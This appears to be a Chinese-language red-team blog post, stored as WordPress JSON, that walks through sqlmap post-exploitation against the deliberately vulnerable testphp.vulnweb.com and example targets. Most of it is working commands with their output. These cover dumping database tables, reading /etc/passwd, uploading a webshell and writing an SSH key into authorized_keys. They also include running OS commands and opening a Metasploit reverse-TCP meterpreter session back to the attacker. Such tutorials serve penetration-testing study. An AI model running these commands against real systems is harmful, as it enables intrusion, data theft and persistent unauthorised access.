<\/p>\n\n\n\n
\u4f7f\u7528sqlmap\u6aa2\u6e2c\u5b8c\u5f8c\u767c\u73fe\u985e\u4f3c\u4ee5\u4e0b\u8a0a\u606f\uff0c\u8868\u793a\u6709\u6f0f\u6d1e <\/p>\n\n\n\n
[INFO] Parameter: \"id\" of type \"integer\" is vulnerable to boolean-based blind injection.<\/code><\/pre>\n\n\n\n\u63a5\u8457\u53ea\u8981\u67e5\u770btarget.txt\u78ba\u8a8d\u6ce8\u5165\u9ede\uff0c\u5c31\u53ef\u9032\u884c\u5f8c\u6ef2\u900f\u7684\u5de5\u4f5c\uff0c\u5982\u4e0b<\/p>\n\n\n\n
\/.local\/share\/sqlmap\/output# cat testphp.vulnweb.com\/target.txt \nhttp:\/\/testphp.vulnweb.com\/artists.php?artist=1 (GET) \n\/.local\/share\/sqlmap\/output# sqlmap -u http:\/\/testphp.vulnweb.com\/artists.php?artist=1 --privileg <\/code><\/pre>\n\n\n\n
\n\n\n\n\u67e5\u770b\u8cc7\u6599\u5eab\u5167\u5bb9<\/h2>\n\n\n\n
–dbs \u5217\u51fa\u6240\u6709db\u540d\u7a31
–tables \u5217\u51fa\u6240\u6709table\u540d\u7a31
–columns \u5217\u51fa\u6240\u6709\u6b04\u4f4d\u8cc7\u6599
-D \u6307\u5b9adb, \u82e5\u8981\u6307\u5b9a\u591a\u500b, \u5247\u5c07db\u540d\u7a31\u4ee5\u9017\u865f\u5206\u9694
-T \u6307\u5b9atables,\u82e5\u8981\u6307\u5b9a\u591a\u500b, \u5247\u5c07table\u540d\u7a31\u4ee5\u9017\u865f\u5206\u9694
-C \u6307\u5b9acolumn,\u82e5\u8981\u6307\u5b9a\u591a\u500b, \u5247\u5c07columns\u540d\u7a31\u4ee5\u9017\u865f\u5206\u9694
–count \u6307\u5b9a\u5217\u51fa\u591a\u5c11\u884c\u8cc7\u6599
–dump \u5c07\u6240\u6709\u8cc7\u6599\u8f38\u51fa
–where \u589e\u52a0\u904e\u6ffe\u689d\u4ef6<\/p>\n\n\n\n
\n\n\n\n\u5217\u51fa\u6240\u6709db\u540d\u7a31<\/p>\n\n\n\n
#sqlmap -u http:\/\/testphp.vulnweb.com\/artists.php?artist=1 --dbs\n...omit...\navailable databases [2]: \n[*] acuart\n[*] information_schema<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
\u5217\u51fa\u8cc7\u6599\u5eabacuart\u7684\u6240\u6709table\u540d\u7a31<\/p>\n\n\n\n
#sqlmap -u http:\/\/testphp.vulnweb.com\/artists.php?artist=1 -D acuart --tables\n...omit\u2026\nDatabase: acuart \n[8 tables]\n+-----------+\n| artists |\n| carts |\n| categ |\n| featured |\n| guestbook |\n| pictures |\n| products |\n| users |\n+-----------+<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
\u5217\u51fa\u8cc7\u6599\u5eabacuart\u4e2d\u8cc7\u6599\u8868users\u7684\u7b46\u6578<\/p>\n\n\n\n
#sqlmap -u http:\/\/testphp.vulnweb.com\/artists.php?artist=1 -D acuart -T users --count\n...omit\u2026\nDatabase: acuart\n+--------+---------+\n| Table | Entries |\n+--------+---------+\n| `user` | 10 |\n+--------+---------+\n...omit...<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
\u5217\u51fa\u8cc7\u6599\u5eabacuart\u4e2d\u8cc7\u6599\u8868users\u7684\u6240\u6709columns\u540d\u7a31<\/p>\n\n\n\n
#sqlmap -u http:\/\/testphp.vulnweb.com\/artists.php?artist=1 -D acuart -T users --columns\n...omit...\nDatabase: acuart \nTable: users\n[8 columns]\n+---------+--------------+\n| Column | Type |\n+---------+--------------+\n| address | mediumtext |\n| cart | varchar(100) |\n| cc | varchar(100) |\n| email | varchar(100) |\n| name | varchar(100) |\n| pass | varchar(100) |\n| phone | varchar(100) |\n| uname | varchar(100) |\n+---------+--------------+<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
\u5217\u51fa\u8cc7\u6599\u5eabacuart\u4e2d\u8cc7\u6599\u8868users\u7684email\u6b04\u4f4d\u8cc7\u6599\uff0c\u4e26\u8f38\u51fa\u6210csv<\/p>\n\n\n\n
#sqlmap -u http:\/\/testphp.vulnweb.com\/artists.php?artist=1 -D acuart -T users -C email --dump\n...\nDatabase: acuart\nTable: users\n[1 entry]\n+-------------------------+\n| email |\n+-------------------------+\n| polola@dino.querumaself |\n+-------------------------+\n[22:35:53] [INFO] table 'acuart.users' dumped to CSV file '\/root\/.sqlmap\/output\/testphp.vulnweb.com\/dump\/acuart\/users.csv'<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
\u5217\u51faproducts\u8cc7\u6599\u8868\u4e2d\uff0c\u7b26\u5408rewritename like ‘%camera%’\u7684\u8cc7\u6599<\/p>\n\n\n\n
# sqlmap -u \"http:\/\/testphp.vulnweb.com\/artists.php?artist=1\" --batch -D acuart -T products --where=\"rewritename like '%camera%'\" --dump\n...omit...\n[11:14:17] [INFO] fetching entries for table 'products' in database 'acuart'\nDatabase: acuart\nTable: products\n[1 entry]\n+----+-------+---------------------------+-------------------+---------------------------+\n| id | price | name | rewritename | description |\n+----+-------+---------------------------+-------------------+---------------------------+\n| 2 | 10 | Web Camera A4Tech PK-335E | web-camera-a4tech | Web Camera A4Tech PK-335E |\n+----+-------+---------------------------+-------------------+---------------------------+\n...omit...\n<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
ps:
\u5982\u679c\u60f3\u8981\u5217\u51fa\u6709\u503c\u7684\u8cc7\u6599\u53ef\u7528 –where=”(name IS NOT NULL AND LENGTH(TRIM(name)) > 0)<\/p>\n\n\n\n
ps:
–dump \u5f8c\u53ef\u4ee5\u63a5 –start=1 –stop=10 \u9650\u5236\u53ea\u53d6\u51fa10\u7b46 <\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n\u53d6\u5f97\u57fa\u672c\u4fe1\u606f<\/h2>\n\n\n\n
<\/p>\n\n\n\n
–current-db \u67e5\u8a62web\u76ee\u524d\u4f7f\u7528\u7684\u8cc7\u6599\u5eab<\/p>\n\n\n\n
–current-user \u67e5\u8a62web\u8cc7\u6599\u5eab\u76ee\u524d\u4f7f\u7528\u7684\u5e33\u865f<\/p>\n\n\n\n
–users \u5217\u51fa\u8cc7\u6599\u5eab\u6240\u6709\u7528\u6236<\/p>\n\n\n\n
\u2013privileg \u6aa2\u8996db\u6b0a\u9650<\/p>\n\n\n\n
–passwords \u5217\u51fa\u8cc7\u6599\u5eab\u7528\u6236\u7684hash\u5bc6\u78bc\uff0c\u4e26\u9806\u4fbf\u5617\u8a66\u7206\u7834\u53d6\u5f97\u660e\u6587(\u53ea\u6703\u5217DB\u7cfb\u7d71\u7684\u5bc6\u78bc\uff0c\u958b\u767c\u7684\u61c9\u7528\u7a0b\u5f0f\u5bc6\u78bc\u4e0d\u6703\u5217\u51fa )<\/p>\n\n\n\n
–schema \u5217\u51faschema<\/p>\n\n\n\n
–exclude-sysdbs \u642d\u914dschema\u4e00\u8d77\u7528\uff0c\u5217\u51fa\u6240\u6709\u975e\u7cfb\u7d71\u8cc7\u6599\u5eab\u7684schema<\/p>\n\n\n\n
\n\n\n\n\u6aa2\u8996db\u6b0a\u9650<\/p>\n\n\n\n
#sqlmap -u http:\/\/testphp.vulnweb.com\/artists.php?artist=1 --privileg
...omit...
database management system users privileges:
[*] 'acuart'@'localhost' [1]:
privilege: USAGE<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
\u67e5\u8a62\u8cc7\u6599\u5eab\u6240\u5728\u4f4d\u7f6e<\/p>\n\n\n\n
#sqlmap -u http:\/\/testphp.vulnweb.com\/artists.php?artist=1 --sql-shell \nsql-shell> select @@datadir\n...omit...\nselect @@datadir: '\/var\/lib\/mysql\/'\n...omit...<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
\u67e5\u770b\u975e\u7cfb\u7d71\u8cc7\u6599\u5eab\u7684schema<\/p>\n\n\n\n
#sqlmap -u http:\/\/testphp.vulnweb.com\/artists.php?artist=1 --schema --exclude-sysdbs\n...omit...\nDatabase: acuart\nTable: categ\n[3 columns]\n+--------+-------------+\n| Column | Type |\n+--------+-------------+\n| cat_id | int |\n| cdesc | tinytext |\n| cname | varchar(50) |\n+--------+-------------+\n\nDatabase: acuart\nTable: pictures\n[8 columns]\n+--------+--------------+\n| Column | Type |\n+--------+--------------+\n| a_id | int |\n| cat_id | int |\n| img | varchar(50) |\n| pic_id | int |\n| plong | text |\n| price | int |\n| pshort | mediumtext |\n| title | varchar(100) |\n+--------+--------------+\n...omit...<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n\u6a94\u6848\u7cfb\u7d71\u63a7\u5236<\/h2>\n\n\n\n\u8b80\u53d6\u6587\u4ef6<\/h3>\n\n\n\n
\u53c3\u6578 –file-read<\/p>\n\n\n\n
<\/p>\n\n\n\n
# sqlmap -r sql.txt --file-read=\/etc\/passwd<\/span>\n...omit...\n[17:40:00] [INFO] resuming back-end DBMS 'mysql'\n[17:40:00] [INFO] testing connection to the target URL\nsqlmap resumed the following injection point(s) from stored session:\n...SNIP...\n[17:40:01] [INFO] fetching file: '\/etc\/passwd'\n[17:40:01] [WARNING] time-based comparison requires larger statistical model, please wait............................. (done)\n[17:40:07] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'\n[17:40:07] [WARNING] unable to retrieve the content of the file '\/etc\/passwd', going to fall-back to simpler UNION technique\n[17:40:07] [INFO] fetching file: '\/etc\/passwd'\ndo you want confirmation that the remote file '\/etc\/passwd' has been successfully downloaded from the back-end DBMS file system? [Y\/n] y\n\n[17:40:14] [INFO] the local file '~\/.sqlmap\/output\/www.example.com\/files\/_etc_passwd' and the remote file '\/etc\/passwd' have the same size (982 B)\nfiles saved to [1]:\n[*] ~\/.sqlmap\/output\/www.example.com\/files\/_etc_passwd (same file)\n\n[*] ending @ 17:40:14 \/2020-11-19\/\n\n# cat ~\/.sqlmap\/output\/www.example.com\/files\/_etc_passwd\nroot:x:0:0:root:\/root:\/bin\/bash\n...omit...<\/code><\/pre>\n\n\n\n\u5982\u679c\u662fwindows\u7cfb\u7d71\u8981\u6ce8\u610f\u659c\u7dda\u65b9\u5411 \uff0c\u5982\u4e0b <\/p>\n\n\n\n
sqlmap -r sql.txt --file-read=\"C:\\boot.ini\"<\/code><\/p>\n\n\n\n
\n\n\n\n\u5beb\u5165\u6587\u4ef6<\/h3>\n\n\n\n
\u53c3\u6578 –file-write(\u672c\u5730\u6a94\u6848\u5167\u5bb9) \u548c–file-dest\uff08\u76ee\u6a19\u4f4d\u7f6e\uff09<\/p>\n\n\n\n
\u4e0a\u50b3\u4e00\u500bwebshell\u5230\/var\/www\/html\/shell.php<\/span><\/p>\n\n\n\n# sqlmap.py -r sql.txt --file-write=shell.php --file-dest=\/var\/www\/html\/shell.php<\/span>\n...omit...\n[17:54:19] [INFO] resuming back-end DBMS 'mysql'\n[17:54:19] [INFO] testing connection to the target URL\nsqlmap resumed the following injection point(s) from stored session:\n...SNIP...\ndo you want confirmation that the local file 'shell.php' has been successfully written on the back-end DBMS file system ('\/var\/www\/html\/shell.php')? [Y\/n] y\n\n[17:54:28] [INFO] the local file 'shell.php' and the remote file '\/var\/www\/html\/shell.php' have the same size (31 B)<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
\u5c07\u516c\u9470\u5beb\u5165\u76ee\u6a19\u670d\u52d9\u5668\u7684 authorized_key\uff0c\u5047\u5982\u5141\u8a31\u516c\u9470\u8a8d\u8b49\uff0c\u4e14SSH\u555f\u7528\uff0c\u4e14user\u5e33\u6236\u80fdssh\u767b\u5165\uff0c\u5373\u53ef\u7528\u9019\u65b9\u6cd5\u9060\u7aefssh<\/p>\n\n\n\n
# sqlmap.py -r sql.txt <\/span>--file-write=id_rsa.pub --file-destination=\/home\/user\/.ssh\/authorized_keys\n...omit...<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
\n\n\n\n\u57f7\u884csql\u8a9e\u6cd5<\/h2>\n\n\n\n
<\/p>\n\n\n\n
\u4e00\u6b21\u4e00\u884c: –sql-query<\/p>\n\n\n\n
$ sqlmap -u http:\/\/testphp.vulnweb.com\/artists.php?artist=1 -D acuart --sql-query=\"select * from users\"<\/code><\/pre>\n\n\n\n \u9032\u5165sql shell: –sql-shell<\/p>\n\n\n\n
$ sqlmap -r Downloads\/ptsmsqli.request -sql-shell \n...omit...\n[07:39:14] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER\nsql-shell> \n<\/code><\/pre>\n\n\n\nps:
–os-shell \u529f\u80fd\u5728\u57f7\u884c\u975e\u67e5\u8a62\u985e\u578b\u7684 SQL \u8a9e\u53e5\uff08\u5982 UPDATE\u3001INSERT\u3001DELETE\u3001DROP \u7b49\uff09\u9700\u8981\u8cc7\u6599\u5eab\u652f\u63f4stacked queries\u3002\u5982\u679c\u8cc7\u6599\u5eab\u4e0d\u652f\u63f4\u5c31\u7121\u6cd5\u57f7\u884c\u9019\u4e9b\u975e\u67e5\u8a62\u8a9e\u53e5<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u5e38\u898bsql\u8a9e\u6cd5<\/p>\n\n\n\n
\nselect @@datadir<\/code> \u67e5\u8a62DB\u6240\u5728\u4f4d\u7f6e<\/li>\n\n\n\nselect @@servername<\/code> \u67e5\u8a62servername<\/li>\n\n\n\nselect @@hostname<\/code> \u67e5\u8a62hostname<\/li>\n\n\n\nSELECT LOAD_FILE(<\/strong>'\/etc\/passwd')<\/strong><\/code><\/li>\n<\/ul>\n\n\n\nrefer
https:\/\/websec.ca\/kb\/sql_injection<\/p>\n\n\n\n
\n\n\n\n\u57f7\u884c\u7cfb\u7d71\u547d\u4ee4<\/h2>\n\n\n\n\u57f7\u884c\u6307\u5b9a\u547d\u4ee4 <\/h3>\n\n\n\n
\u53c3\u6578: –os-cmd \uff0c\u4e00\u6b21\u53ea\u80fd\u57f7\u884c\u4e00\u500b\u547d\u4ee4<\/p>\n\n\n\n
\u57f7\u884cls\u547d\u4ee4 sqlmap -r sql.txt --os-cmd ls<\/code><\/p>\n\n\n\n\u57f7\u884cid\u547d\u4ee4<\/p>\n\n\n\n
# sqlmap -r sql.txt -p item --os-cmd id\n...omit...\ndo you want to retrieve the command standard output? [Y\/n\/a] y\ncommand standard output:\n'uid=104(postgres) gid=106(postgres) groups=106(postgres)'<\/mark>\n[hh:mm:19] [INFO] cleaning up the database management system\ndo you want to remove UDF 'sys_eval'? [Y\/n] y\ndo you want to remove UDF 'sys_exec'? [Y\/n] y\n[hh:mm:23] [INFO] database management system cleanup finished\n[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can only be deleted manually<\/code><\/pre>\n\n\n\n
\n\n\n\n\u4f7f\u7528shell<\/h3>\n\n\n\n
\u6a21\u64ec\u4e00\u500b\u53ef\u4ee5\u57f7\u884c\u4efb\u610f\u6307\u4ee4\u7684 shell\uff0c\u5c31\u53ef\u4ee5\u57f7\u884c\u591a\u500b\u547d\u4ee4 <\/p>\n\n\n\n
\u53c3\u6578: –os-shell<\/p>\n\n\n\n
\u57f7\u884c\u5f8c\u6703\u9078\u64c7\u7a0b\u5f0f\u8a9e\u8a00\u8207\u53ef\u5beb\u5165\u7684\u4f4d\u7f6e<\/p>\n\n\n\n
# sqlmap -r sql.txt --os-shell\n...omit...\nwhich web application language does the web server support?\n[1] ASP \n[2] ASPX\n[3] JSP\n[4] PHP (default)\n> 4 # As my Target system web server supports PHP \n...omit...\nwhat do you want to use for writable directory?\n[1] common location(s) ('C:\/xampp\/htdocs\/, C:\/wamp\/www\/, C:\/Inetpub\/wwwroot\/') (default)\n[2] custom location(s)\n[3] custom directory list file\n[4] brute force search\n...omit...\n[12:39:08] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER\nos-shell> <\/code><\/pre>\n\n\n\n\u78ba\u8a8d\u6709\u53ef\u5beb\u5165\u7684\u4f4d\u7f6e\u5f8c\u5c31\u6703\u4e0a\u50b3shell\uff0c\u4e26\u63d0\u4f9bshell\u4e92\u52d5\u4ecb\u9762 <\/p>\n\n\n\n
\u4f46\u5982\u679c\u662f\u7528\u5230windows\u7684xp_cmdshell\uff0c\u5728\u4e0d\u662fDBA\u7684\u60c5\u6cc1\u4e0b\u53ef\u80fd\u4e5f\u6703\u986f\u793aos-shell\u6210\u529f\uff0c\u4f46\u7121\u6cd5\u986f\u793a\u6307\u4ee4\u7684\u56de\u50b3\u7d50\u679c\u800c\u51fa\u73feNo output<\/p>\n\n\n\n
...omit...\n[15:23:41] [INFO] going to use extended procedure 'xp_cmdshell' for operating system command execution\n[15:23:41] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER\nos-shell> whoami\ndo you want to retrieve the command standard output? [Y\/n\/a] Y\n[15:24:41] [INFO] retrieved: 0\nNo output<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
\u4f7f\u7528\u7b2c\u4e09\u65b9\u5de5\u5177\u9023\u7dda<\/h3>\n\n\n\n
\u53c3\u6578: –os-pwn<\/p>\n\n\n\n
# sqlmap -r sql.txt --os-pwn\n...omit...\nhow do you want to establish the tunnel?\n[1] TCP: Metasploit Framework (default)\n[2] ICMP: icmpsh - ICMP tunneling\n...omit...\nwhich web application language does the web server support?\n[1] ASP (default)\n[2] ASPX\n[3] JSP\n[4] PHP\n...omit...\nwhat do you want to use for writable directory?\n[1] common location(s) ('C:\/xampp\/htdocs\/, C:\/wamp\/www\/, C:\/Inetpub\/wwwroot\/') (default)\n[2] custom location(s)\n[3] custom directory list file\n[4] brute force search<\/code><\/pre>\n\n\n\n\u5982\u679c\u525b\u525b\u9078 Metasploit\u5c31\u6703\u51fa\u73fe\u4ee5\u4e0b\u9078\u64c7<\/p>\n\n\n\n
which connection type do you want to use?\n[1] Reverse TCP: Connect back from the database host to this machine (default)\n[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535\n[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP\n[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS\n[5] Bind TCP: Listen on the database host for a connection\n> 1 # Reverse TCP is a good choice for establishing a connection\nwhat is the local address? [Enter for '192.168.1.101' (detected)] # No need to change LHost, LPort\nwhich local port number do you want to use? [47984] \nwhich payload do you want to use?\n[1] Meterpreter (default)\n[2] Shell\n[3] VNC\n...omit...\nmeterpreter ><\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
ps:
common location(s)\u7522\u751f\u65b9\u5f0f\uff0c\u6703\u6839\u64dasqlmap\u539f\u59cb\u78bc\u4e2d\u7684 lib\/core\/settings.py \u52d5\u614b\u7522\u751f<\/p>\n\n\n\n
<\/p>\n\n\n\n
refer
http:\/\/iosec.in\/sqlmap-4\/
https:\/\/www.cybersecmastery.in\/2022\/12\/operating-system-takeover-with-sqlmap.html<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
\u6e05\u9664\u4e0a\u6b21SQLmap\u7684\u5feb\u53d6<\/h2>\n\n\n\n
<\/p>\n\n\n\n
\u65b9\u6cd51<\/h3>\n\n\n\n
\u5237\u65b0session\u6587\u4ef6<\/p>\n\n\n\n
\u53c3\u6578\uff1a\u2013flush-session<\/code><\/p>\n\n\n\n\u5982\u679c\u4e0d\u60f3\u7528\u4e4b\u524d\u5feb\u53d6\u9019\u500b\u76ee\u6a19\u7684session\u6578\u64da\uff0c\u53ef\u4ee5\u4f7f\u7528\u9019\u500b\u53c3\u6578\u3002\u6703\u6e05\u7a7a\u4e4b\u524d\u7684session\uff0c\u91cd\u65b0\u6e2c\u8a66\u8a72\u76ee\u6a19\u3002<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u65b9\u6cd52<\/h3>\n\n\n\n
\u5ffd\u7565\u5728session\u6578\u64da\u4e2d\u5132\u5b58\u7684\u67e5\u8a62\u7d50\u679c\uff0c\u4f46\u4e0d\u6703\u6e05\u9664session\u6578\u64da<\/p>\n\n\n\n
\u53c3\u6578\uff1a\u2013fresh-queries<\/code><\/p>\n\n\n\n<\/p>\n\n\n\n
\u65b9\u6cd53<\/h4>\n\n\n\n
\u76f4\u63a5\u522a\u9664sqlmap output\u8cc7\u6599\u593e\u4e0b\u7684\u5c0d\u61c9\u7684\u76ee\u6a19\u76ee\u9304<\/p>\n\n\n\n
\u4f4d\u7f6e\u901a\u5e38\u5728\/home\/kali\/.local\/share\/sqlmap\/output\/<target><\/code><\/p>\n\n\n\n\u8a72\u76ee\u9304\u4e0b\u901a\u5e38\u6703\u6709\u4ee5\u4e0b\u6a94\u6848:<\/p>\n\n\n\n
\n- session.sqlite\uff1asqlmap\u6e2c\u8a66\u7684\u7d50\u679c\u90fd\u6703\u4fdd\u5b58\u5728\u9019\u500b\u6a94\u6848\u88e1 <\/li>\n\n\n\n
- log\uff1asqlmap\u767c\u73fe\u6f0f\u6d1e\u5f8c\u4e0b\u6307\u4ee4\u6703\u505a\u8a18\u9304<\/li>\n\n\n\n
- target.txt\uff1a\u8a18\u9304\u539f\u672csqlmap\u7684\u6aa2\u6e2c\u6307\u4ee4<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"
\u4f7f\u7528sqlmap\u6aa2\u6e2c\u5b8c\u5f8c\u767c\u73fe\u985e\u4f3c\u4ee5\u4e0b\u8a0a\u606f\uff0c\u8868\u793a\u6709\u6f0f\u6d1e \u63a5\u8457\u53ea …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"enabled":false},"version":2}},"categories":[369],"tags":[],"class_list":["post-1818","post","type-post","status-publish","format-standard","hentry","category-red-team"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1818","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1818"}],"version-history":[{"count":9,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1818\/revisions"}],"predecessor-version":[{"id":3041,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1818\/revisions\/3041"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1818"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1818"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1818"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}